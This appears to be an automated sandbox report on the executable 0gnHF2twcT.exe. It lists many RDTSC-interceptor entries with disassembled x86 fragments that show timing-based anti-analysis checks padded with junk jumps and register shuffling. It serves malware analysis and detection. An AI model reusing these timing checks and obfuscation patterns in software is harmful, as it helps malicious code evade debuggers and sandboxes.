Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3622C0 second address: 3622E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dx, di 0x0000000e push dword ptr [ebp+122D2AFFh] 0x00000014 mov dword ptr [ebp+122D1B97h], ebx 0x0000001a push D9981F08h 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 363664 second address: 363669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 363669 second address: 363674 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F05491602D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 365492 second address: 3654A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0549119942h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3654A9 second address: 3654BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27F500 second address: 27F505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49C036F second address: 49C039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 4E18DDB6h 0x00000012 jmp 00007F05491602E7h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49C039F second address: 49C0407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F0549119943h 0x00000014 sbb eax, 7F36D84Eh 0x0000001a jmp 00007F0549119949h 0x0000001f popfd 0x00000020 call 00007F0549119940h 0x00000025 pop eax 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49C0407 second address: 49C0424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dl, D6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E064F second address: 49E0654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0654 second address: 49E0664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0664 second address: 49E0668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0668 second address: 49E066E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E066E second address: 49E06C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0549119944h 0x00000009 adc ah, FFFFFF98h 0x0000000c jmp 00007F054911993Bh 0x00000011 popfd 0x00000012 push esi 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F0549119945h 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F054911993Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E06C0 second address: 49E06C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E06C6 second address: 49E06E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0549119942h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E06E4 second address: 49E072E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F05491602E6h 0x0000000f push eax 0x00000010 jmp 00007F05491602DBh 0x00000015 xchg eax, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F05491602E5h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0896 second address: 49E089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E089A second address: 49E08A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0905 second address: 49E0922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0983 second address: 49E09D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0EE371E2h 0x00000008 pushfd 0x00000009 jmp 00007F05491602E3h 0x0000000e or cx, 1ADEh 0x00000013 jmp 00007F05491602E9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F05491602DDh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E09D2 second address: 49E09F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119941h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, 3895h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E09F0 second address: 49E0A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b jmp 00007F05491602E4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F05491602E0h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0A27 second address: 49D01D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119942h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a retn 0004h 0x0000000d nop 0x0000000e cmp eax, 00000000h 0x00000011 setne al 0x00000014 jmp 00007F0549119932h 0x00000016 xor ebx, ebx 0x00000018 test al, 01h 0x0000001a jne 00007F0549119937h 0x0000001c sub esp, 04h 0x0000001f mov dword ptr [esp], 0000000Dh 0x00000026 call 00007F054DA4709Dh 0x0000002b mov edi, edi 0x0000002d jmp 00007F0549119947h 0x00000032 xchg eax, ebp 0x00000033 jmp 00007F0549119946h 0x00000038 push eax 0x00000039 jmp 00007F054911993Bh 0x0000003e xchg eax, ebp 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007F054911993Bh 0x00000047 call 00007F0549119948h 0x0000004c pop eax 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D01D7 second address: 49D01DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D01DD second address: 49D01E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D01E1 second address: 49D01E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D030C second address: 49D0313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0313 second address: 49D0319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0319 second address: 49D031D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0360 second address: 49D037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D037C second address: 49D0413 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d jmp 00007F054911993Fh 0x00000012 sub edi, edi 0x00000014 pushad 0x00000015 call 00007F0549119945h 0x0000001a pushfd 0x0000001b jmp 00007F0549119940h 0x00000020 add eax, 44C1C408h 0x00000026 jmp 00007F054911993Bh 0x0000002b popfd 0x0000002c pop esi 0x0000002d pushfd 0x0000002e jmp 00007F0549119949h 0x00000033 sbb cx, 2726h 0x00000038 jmp 00007F0549119941h 0x0000003d popfd 0x0000003e popad 0x0000003f inc ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0413 second address: 49D0417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0417 second address: 49D041D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D041D second address: 49D047F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F05491602E0h 0x00000009 add ax, E3F8h 0x0000000e jmp 00007F05491602DBh 0x00000013 popfd 0x00000014 mov ah, F5h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test al, al 0x0000001b jmp 00007F05491602DBh 0x00000020 je 00007F054916053Ah 0x00000026 pushad 0x00000027 mov edi, eax 0x00000029 mov edi, eax 0x0000002b popad 0x0000002c lea ecx, dword ptr [ebp-14h] 0x0000002f pushad 0x00000030 mov ax, B70Fh 0x00000034 mov cx, B52Bh 0x00000038 popad 0x00000039 mov dword ptr [ebp-14h], edi 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F05491602DDh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D04B7 second address: 49D0509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov al, 6Ch 0x0000000d pushfd 0x0000000e jmp 00007F0549119943h 0x00000013 or esi, 63D6C53Eh 0x00000019 jmp 00007F0549119949h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 mov si, dx 0x00000025 push eax 0x00000026 push edx 0x00000027 mov esi, ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D05BB second address: 49D05C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D05C1 second address: 49D05C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D05C6 second address: 49D060B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F05491602DAh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test eax, eax 0x0000000f jmp 00007F05491602E1h 0x00000014 jg 00007F05BB3BE177h 0x0000001a jmp 00007F05491602DEh 0x0000001f js 00007F054916038Fh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D060B second address: 49D0628 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0628 second address: 49D0638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0638 second address: 49D0695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp-14h], edi 0x0000000e jmp 00007F0549119946h 0x00000013 jne 00007F05BB37776Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F054911993Dh 0x00000022 sub esi, 782B3BD6h 0x00000028 jmp 00007F0549119941h 0x0000002d popfd 0x0000002e movzx eax, bx 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0695 second address: 49D06B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602E9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D06B2 second address: 49D06B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D06B6 second address: 49D071A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b jmp 00007F05491602DDh 0x00000010 lea eax, dword ptr [ebp-2Ch] 0x00000013 jmp 00007F05491602DEh 0x00000018 xchg eax, esi 0x00000019 jmp 00007F05491602E0h 0x0000001e push eax 0x0000001f jmp 00007F05491602DBh 0x00000024 xchg eax, esi 0x00000025 jmp 00007F05491602E6h 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D071A second address: 49D071E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D071E second address: 49D0724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0724 second address: 49D0729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0729 second address: 49D0774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F05491602E7h 0x0000000f nop 0x00000010 pushad 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F05491602E2h 0x00000018 sub esi, 4D4C2DD8h 0x0000001e jmp 00007F05491602DBh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0774 second address: 49D07DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F0549119946h 0x0000000b or esi, 4FF37838h 0x00000011 jmp 00007F054911993Bh 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, ebx 0x00000019 pushad 0x0000001a jmp 00007F0549119944h 0x0000001f mov dl, ch 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 call 00007F0549119949h 0x0000002b pop eax 0x0000002c mov dx, 10A4h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D07DF second address: 49D07F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 01CCE22Fh 0x00000008 mov cl, 72h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D07F2 second address: 49D07F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D07F6 second address: 49D0836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007F05491602DEh 0x00000011 add esi, 428F81B8h 0x00000017 jmp 00007F05491602DBh 0x0000001c popfd 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0847 second address: 49D0855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0855 second address: 49D0895 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 jmp 00007F05491602DAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, eax 0x00000010 jmp 00007F05491602E0h 0x00000015 test esi, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F05491602E7h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0895 second address: 49D0008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 6C53C84Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F05BB3776EBh 0x00000011 xor eax, eax 0x00000013 jmp 00007F05490F306Ah 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b leave 0x0000001c retn 0004h 0x0000001f nop 0x00000020 xor ebx, ebx 0x00000022 cmp eax, 00000000h 0x00000025 je 00007F0549119A93h 0x0000002b call 00007F054DA46DBDh 0x00000030 mov edi, edi 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0008 second address: 49D000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D000C second address: 49D0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0012 second address: 49D0067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F05491602DEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F05491602DCh 0x00000019 sbb esi, 7AB80098h 0x0000001f jmp 00007F05491602DBh 0x00000024 popfd 0x00000025 mov esi, 6F3C364Fh 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0067 second address: 49D00CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119945h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F054911993Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F0549119940h 0x00000016 xchg eax, ecx 0x00000017 jmp 00007F0549119940h 0x0000001c push eax 0x0000001d pushad 0x0000001e call 00007F054911993Ch 0x00000023 mov cx, F191h 0x00000027 pop esi 0x00000028 popad 0x00000029 xchg eax, ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D00CD second address: 49D00D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D00D1 second address: 49D00E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119942h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D00E7 second address: 49D00F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D015B second address: 49D0161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0161 second address: 49D0165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0165 second address: 49D0169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0D90 second address: 49D0DF1 instructions: 0x00000000 rdtsc 0x00000002 call 00007F05491602E5h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 call 00007F05491602DFh 0x00000015 mov ch, B2h 0x00000017 pop edi 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c jmp 00007F05491602E0h 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F05491602E7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0DF1 second address: 49D0E47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [76C8459Ch], 05h 0x00000010 jmp 00007F054911993Eh 0x00000015 je 00007F05BB367512h 0x0000001b pushad 0x0000001c mov eax, 0734277Dh 0x00000021 mov ax, BE79h 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F054911993Eh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0E47 second address: 49D0E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0E4B second address: 49D0E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0E51 second address: 49D0E62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0ECE second address: 49D0EEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 1C2885D1h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, CB97h 0x00000015 mov esi, 0CD08A33h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0EEF second address: 49D0EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49D0EF5 second address: 49D0F4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 6AEF19F9h 0x00000012 jmp 00007F0549119946h 0x00000017 call 00007F05BB36E585h 0x0000001c push 76C22B70h 0x00000021 push dword ptr fs:[00000000h] 0x00000028 mov eax, dword ptr [esp+10h] 0x0000002c mov dword ptr [esp+10h], ebp 0x00000030 lea ebp, dword ptr [esp+10h] 0x00000034 sub esp, eax 0x00000036 push ebx 0x00000037 push esi 0x00000038 push edi 0x00000039 mov eax, dword ptr [76C84538h] 0x0000003e xor dword ptr [ebp-04h], eax 0x00000041 xor eax, ebp 0x00000043 push eax 0x00000044 mov dword ptr [ebp-18h], esp 0x00000047 push dword ptr [ebp-08h] 0x0000004a mov eax, dword ptr [ebp-04h] 0x0000004d mov dword ptr [ebp-04h], FFFFFFFEh 0x00000054 mov dword ptr [ebp-08h], eax 0x00000057 lea eax, dword ptr [ebp-10h] 0x0000005a mov dword ptr fs:[00000000h], eax 0x00000060 ret 0x00000061 jmp 00007F0549119940h 0x00000066 